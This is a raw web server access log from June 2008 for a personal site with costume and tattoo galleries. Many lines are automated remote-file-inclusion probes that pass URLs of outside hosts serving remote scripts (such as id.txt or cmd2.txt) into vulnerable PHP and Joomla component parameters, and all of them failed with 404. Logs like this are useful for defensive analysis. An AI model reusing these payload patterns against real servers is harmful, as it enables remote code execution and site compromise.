79.129.150.139 - - [21/Jun/2008:20:35:28 -0500] "GET /costume/costm_a.JPG HTTP/1.1" 200 61141 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
72.29.81.233 - - [21/Jun/2008:20:41:17 -0500] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/old? HTTP/1.1" 404 333 "-""libwww-perl/5.811"
72.29.81.233 - - [21/Jun/2008:20:41:17 -0500] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/1? HTTP/1.1" 404 333 "-""libwww-perl/5.811"
72.29.81.233 - - [21/Jun/2008:20:41:17 -0500] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/old? HTTP/1.1" 404 328 "-""libwww-perl/5.811"
72.29.81.233 - - [21/Jun/2008:20:41:17 -0500] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/1? HTTP/1.1" 404 328 "-""libwww-perl/5.811"
80.67.25.167 - - [21/Jun/2008:20:43:10 -0500] "GET /logs//agendax/addevent.inc.php?agendax_path=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 314 "-""libwww-perl/5.808"
80.67.25.167 - - [21/Jun/2008:20:43:10 -0500] "GET //agendax/addevent.inc.php?agendax_path=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 309 "-""libwww-perl/5.808"
74.53.178.146 - - [21/Jun/2008:20:45:31 -0500] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 313 "-""libwww-perl/5.79"
74.53.178.146 - - [21/Jun/2008:20:45:31 -0500] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 308 "-""libwww-perl/5.79"
72.29.81.233 - - [21/Jun/2008:20:48:08 -0500] "GET /logs//ktmlpro/includes/ktedit/toolbar.php?dirDepth=ftp://24.227.40.218/temp/trem/old? HTTP/1.1" 404 325 "-""libwww-perl/5.811"
72.29.81.233 - - [21/Jun/2008:20:48:08 -0500] "GET /logs//ktmlpro/includes/ktedit/toolbar.php?dirDepth=ftp://24.227.40.218/temp/trem/1? HTTP/1.1" 404 325 "-""libwww-perl/5.811"
72.29.81.233 - - [21/Jun/2008:20:48:08 -0500] "GET //ktmlpro/includes/ktedit/toolbar.php?dirDepth=ftp://24.227.40.218/temp/trem/old? HTTP/1.1" 404 320 "-""libwww-perl/5.811"
72.29.81.233 - - [21/Jun/2008:20:48:08 -0500] "GET //ktmlpro/includes/ktedit/toolbar.php?dirDepth=ftp://24.227.40.218/temp/trem/1? HTTP/1.1" 404 320 "-""libwww-perl/5.811"
72.29.81.233 - - [21/Jun/2008:20:51:00 -0500] "GET /logs/index.php?pagina1=ftp://24.227.40.218/temp/trem/old? HTTP/1.1" 404 298 "-""libwww-perl/5.811"
72.29.81.233 - - [21/Jun/2008:20:51:00 -0500] "GET /logs/index.php?pagina1=ftp://24.227.40.218/temp/trem/1? HTTP/1.1" 404 298 "-""libwww-perl/5.811"
72.29.81.233 - - [21/Jun/2008:20:51:00 -0500] "GET /index.php?pagina1=ftp://24.227.40.218/temp/trem/old? HTTP/1.1" 404 293 "-""libwww-perl/5.811"
72.29.81.233 - - [21/Jun/2008:20:51:00 -0500] "GET /index.php?pagina1=ftp://24.227.40.218/temp/trem/1? HTTP/1.1" 404 293 "-""libwww-perl/5.811"
217.110.54.240 - - [21/Jun/2008:20:51:12 -0500] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 317 "-""libwww-perl/5.803"
217.110.54.240 - - [21/Jun/2008:20:51:12 -0500] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 312 "-""libwww-perl/5.803"
151.199.40.44 - - [21/Jun/2008:20:57:32 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "http://www.google.com/search?ndsp=20&um=1&hl=en&rlz=1T4IBMA_en___US206&q=vintage%20flash%20tattoo&ie=UTF-8&sa=N&tab=iw""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
151.199.40.44 - - [21/Jun/2008:20:57:36 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
151.199.40.44 - - [21/Jun/2008:20:57:36 -0500] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
201.75.184.75 - - [21/Jun/2008:20:59:04 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "http://images.google.com/imgres?imgurl=http://tomdolan.pconline.com/tattoo/webring.jpg&imgrefurl=http://tomdolan.pconline.com/tattoo/tattoo1.htm&h=194&w=225&sz=13&hl=pt-BR&start=669&um=1&tbnid=fuQXIcqpCqKozM:&tbnh=93&tbnw=108&prev=/images%3Fq%3D%2Btattoo%2BOld%2Bschool%26start%3D660%26ndsp%3D20%26um%3D1%26hl%3Dpt-BR%26rls%3Dcom.microsoft:pt-br:IE-SearchBox%26rlz%3D1I7ADBS%26sa%3DN""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Embedded Web Browser from: http://bsalsa.com/; .NET CLR 1.1.4322; FDM; .NET CLR 2.0.50727)"
201.75.184.75 - - [21/Jun/2008:20:59:04 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Embedded Web Browser from: http://bsalsa.com/; .NET CLR 1.1.4322; FDM; .NET CLR 2.0.50727)"
201.75.184.75 - - [21/Jun/2008:20:59:05 -0500] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Embedded Web Browser from: http://bsalsa.com/; .NET CLR 1.1.4322; FDM; .NET CLR 2.0.50727)"
201.75.184.75 - - [21/Jun/2008:20:59:12 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Embedded Web Browser from: http://bsalsa.com/; .NET CLR 1.1.4322; FDM; .NET CLR 2.0.50727)"
80.67.25.167 - - [21/Jun/2008:20:59:26 -0500] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 333 "-""libwww-perl/5.808"
80.67.25.167 - - [21/Jun/2008:20:59:26 -0500] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 328 "-""libwww-perl/5.808"
80.67.25.167 - - [21/Jun/2008:21:07:11 -0500] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 323 "-""libwww-perl/5.808"
80.67.25.167 - - [21/Jun/2008:21:07:11 -0500] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 318 "-""libwww-perl/5.808"
217.110.54.240 - - [21/Jun/2008:21:09:42 -0500] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 323 "-""libwww-perl/5.803"
217.110.54.240 - - [21/Jun/2008:21:09:42 -0500] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 318 "-""libwww-perl/5.803"
80.67.25.167 - - [21/Jun/2008:21:20:44 -0500] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.808"
80.67.25.167 - - [21/Jun/2008:21:20:44 -0500] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.808"
65.214.44.28 - - [21/Jun/2008:21:23:54 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1"
65.214.44.28 - - [21/Jun/2008:21:23:54 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1"
65.214.44.28 - - [21/Jun/2008:21:23:54 -0500] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1"
216.26.220.35 - - [21/Jun/2008:21:28:02 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 4913 "http://www.ravensgard.org/gerekr/costume.html""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
216.26.220.35 - - [21/Jun/2008:21:28:03 -0500] "GET /costume/enter1.gif HTTP/1.1" 200 22826 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
216.26.220.35 - - [21/Jun/2008:21:28:04 -0500] "GET /costume/history5.gif HTTP/1.1" 200 4380 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
216.26.220.35 - - [21/Jun/2008:21:28:05 -0500] "GET /costume/costm_a.JPG HTTP/1.1" 200 61141 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
216.26.220.35 - - [21/Jun/2008:21:28:06 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
207.213.245.215 - - [21/Jun/2008:21:28:15 -0500] "GET /logs/access_log.1207785600//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://nozyk.org/rob.txt? HTTP/1.1" 404 361 "-""libwww-perl/5.65"
216.26.220.35 - - [21/Jun/2008:21:28:25 -0500] "GET /costume/costume2.htm HTTP/1.1" 200 1810 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
217.110.54.240 - - [21/Jun/2008:21:38:00 -0500] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
217.110.54.240 - - [21/Jun/2008:21:38:01 -0500] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
74.200.201.194 - - [21/Jun/2008:21:40:49 -0500] "GET /logs/ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://rjoos.ch:/Reise/images/tOtti/r8? HTTP/1.1" 404 324 "-""libwww-perl/5.810"
74.200.201.194 - - [21/Jun/2008:21:40:49 -0500] "GET /ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://rjoos.ch:/Reise/images/tOtti/r8? HTTP/1.1" 404 319 "-""libwww-perl/5.810"
217.110.54.240 - - [21/Jun/2008:21:43:05 -0500] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
217.110.54.240 - - [21/Jun/2008:21:43:06 -0500] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
80.67.25.167 - - [21/Jun/2008:21:47:38 -0500] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.808"
80.67.25.167 - - [21/Jun/2008:21:47:39 -0500] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.808"
80.67.25.167 - - [21/Jun/2008:22:04:32 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.808"
80.67.25.167 - - [21/Jun/2008:22:04:32 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.808"
74.6.17.158 - - [21/Jun/2008:22:05:03 -0500] "GET /tattoo/tattoo1.htm HTTP/1.0" 304 - "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
212.143.233.40 - - [21/Jun/2008:22:13:45 -0500] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.bes.org.tr/imgcls/cmd2.txt? HTTP/1.1" 404 319 "-""libwww-perl/5.79"
212.143.233.40 - - [21/Jun/2008:22:13:46 -0500] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.bes.org.tr/imgcls/cmd2.txt? HTTP/1.1" 404 314 "-""libwww-perl/5.79"
208.76.44.141 - - [21/Jun/2008:22:13:46 -0500] "GET /robots.txt HTTP/1.0" 404 282 "http://tomdolan.pconline.com/costume/""Mozilla/5.0 (compatible; zermelo/1.0.1 +http://www.powerset.com/about/zermelo)"
208.76.44.141 - - [21/Jun/2008:22:13:53 -0500] "GET /costume/ HTTP/1.0" 200 640 "-""Mozilla/5.0 (compatible; zermelo/1.0.1 +http://www.powerset.com/about/zermelo)"
62.128.131.80 - - [21/Jun/2008:22:55:12 -0500] "GET /logs/admin.php?cal_dir=http://www.team-orion.com/toptalk/ci_builders/id.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.803"
62.128.131.80 - - [21/Jun/2008:22:55:12 -0500] "GET /admin.php?cal_dir=http://www.team-orion.com/toptalk/ci_builders/id.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.803"
74.53.178.146 - - [21/Jun/2008:23:01:38 -0500] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 329 "-""libwww-perl/5.79"
74.53.178.146 - - [21/Jun/2008:23:01:38 -0500] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 324 "-""libwww-perl/5.79"
85.17.93.163 - - [21/Jun/2008:23:03:26 -0500] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://rehab.ru/images/stories/ooid.txt?? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
85.17.93.163 - - [21/Jun/2008:23:03:29 -0500] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://rehab.ru/images/stories/ooid.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
85.17.93.163 - - [21/Jun/2008:23:03:42 -0500] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://rehab.ru/images/stories/ooid.txt?? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
85.17.93.163 - - [21/Jun/2008:23:03:46 -0500] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://rehab.ru/images/stories/ooid.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
74.6.17.158 - - [21/Jun/2008:23:10:55 -0500] "GET /costume/thmb7.htm HTTP/1.0" 200 2819 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
87.253.213.4 - - [21/Jun/2008:23:12:56 -0500] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 338 "-""libwww-perl/5.79"
87.253.213.4 - - [21/Jun/2008:23:12:56 -0500] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 333 "-""libwww-perl/5.79"
190.34.160.226 - - [21/Jun/2008:23:13:14 -0500] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
190.34.160.226 - - [21/Jun/2008:23:13:14 -0500] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
70.24.150.118 - - [21/Jun/2008:23:19:18 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 4913 "http://www.ravensgard.org/gerekr/costume.html""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
70.24.150.118 - - [21/Jun/2008:23:19:18 -0500] "GET /costume/enter1.gif HTTP/1.1" 200 22826 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
70.24.150.118 - - [21/Jun/2008:23:19:18 -0500] "GET /costume/costm_a.JPG HTTP/1.1" 200 61141 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
70.24.150.118 - - [21/Jun/2008:23:19:19 -0500] "GET /costume/history5.gif HTTP/1.1" 200 4380 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
70.24.150.118 - - [21/Jun/2008:23:19:20 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
85.17.93.163 - - [21/Jun/2008:23:25:15 -0500] "GET /logs//jeticu.com//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://rehab.ru/images/stories/ooid.txt?? HTTP/1.1" 404 337 "-""libwww-perl/5.805"
85.17.93.163 - - [21/Jun/2008:23:25:19 -0500] "GET //jeticu.com//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://rehab.ru/images/stories/ooid.txt?? HTTP/1.1" 404 332 "-""libwww-perl/5.805"
74.6.17.158 - - [21/Jun/2008:23:26:11 -0500] "GET /logs/access_log.1194393600 HTTP/1.0" 200 194805 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
85.17.93.163 - - [21/Jun/2008:23:28:07 -0500] "GET /logs//jeticu.com//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://rehab.ru/images/stories/ooid.txt?? HTTP/1.1" 404 337 "-""libwww-perl/5.805"
85.17.93.163 - - [21/Jun/2008:23:28:10 -0500] "GET //jeticu.com//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://rehab.ru/images/stories/ooid.txt?? HTTP/1.1" 404 332 "-""libwww-perl/5.805"
66.249.67.136 - - [21/Jun/2008:23:30:25 -0500] "GET /costume/thmb1.htm HTTP/1.1" 304 - "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
190.196.13.90 - - [21/Jun/2008:23:42:55 -0500] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 338 "-""libwww-perl/5.79"
190.196.13.90 - - [21/Jun/2008:23:42:55 -0500] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 333 "-""libwww-perl/5.79"
204.246.125.62 - - [21/Jun/2008:23:47:20 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0"
204.246.125.62 - - [21/Jun/2008:23:47:20 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0"
204.246.125.62 - - [21/Jun/2008:23:47:20 -0500] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0"
204.246.125.62 - - [21/Jun/2008:23:47:20 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0"
204.246.125.62 - - [21/Jun/2008:23:47:22 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2676 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0"
204.246.125.62 - - [21/Jun/2008:23:47:22 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0"
204.246.125.62 - - [21/Jun/2008:23:47:22 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0"
204.246.125.62 - - [21/Jun/2008:23:47:22 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0"
204.246.125.62 - - [21/Jun/2008:23:47:22 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0"
204.246.125.62 - - [21/Jun/2008:23:47:23 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0"
204.246.125.62 - - [21/Jun/2008:23:47:23 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0"
204.246.125.62 - - [21/Jun/2008:23:47:23 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0"
204.246.125.62 - - [21/Jun/2008:23:47:23 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0"
204.246.125.62 - - [21/Jun/2008:23:47:23 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0"
204.246.125.62 - - [21/Jun/2008:23:47:23 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0"
204.246.125.62 - - [21/Jun/2008:23:47:23 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0"
204.246.125.62 - - [21/Jun/2008:23:47:24 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0"
204.246.125.62 - - [21/Jun/2008:23:47:42 -0500] "GET /tattoo/set2.htm HTTP/1.1" 200 2378 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0"
204.246.125.62 - - [21/Jun/2008:23:47:42 -0500] "GET /tattoo/tatb1.JPG HTTP/1.1" 200 14848 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0"
204.246.125.62 - - [21/Jun/2008:23:47:42 -0500] "GET /tattoo/tatb10.JPG HTTP/1.1" 200 17887 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0"
204.246.125.62 - - [21/Jun/2008:23:47:42 -0500] "GET /tattoo/tatb2.JPG HTTP/1.1" 200 16592 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0"
204.246.125.62 - - [21/Jun/2008:23:47:42 -0500] "GET /tattoo/tatb3.JPG HTTP/1.1" 200 16163 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0"
204.246.125.62 - - [21/Jun/2008:23:47:42 -0500] "GET /tattoo/tatb4.JPG HTTP/1.1" 200 15705 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0"
204.246.125.62 - - [21/Jun/2008:23:47:43 -0500] "GET /tattoo/tatb5.JPG HTTP/1.1" 200 20135 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0"
204.246.125.62 - - [21/Jun/2008:23:47:43 -0500] "GET /tattoo/tatb6.JPG HTTP/1.1" 200 21190 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0"
204.246.125.62 - - [21/Jun/2008:23:47:43 -0500] "GET /tattoo/tatb7.JPG HTTP/1.1" 200 16193 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0"
204.246.125.62 - - [21/Jun/2008:23:47:43 -0500] "GET /tattoo/tatb8.JPG HTTP/1.1" 200 18467 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0"
204.246.125.62 - - [21/Jun/2008:23:47:43 -0500] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0"
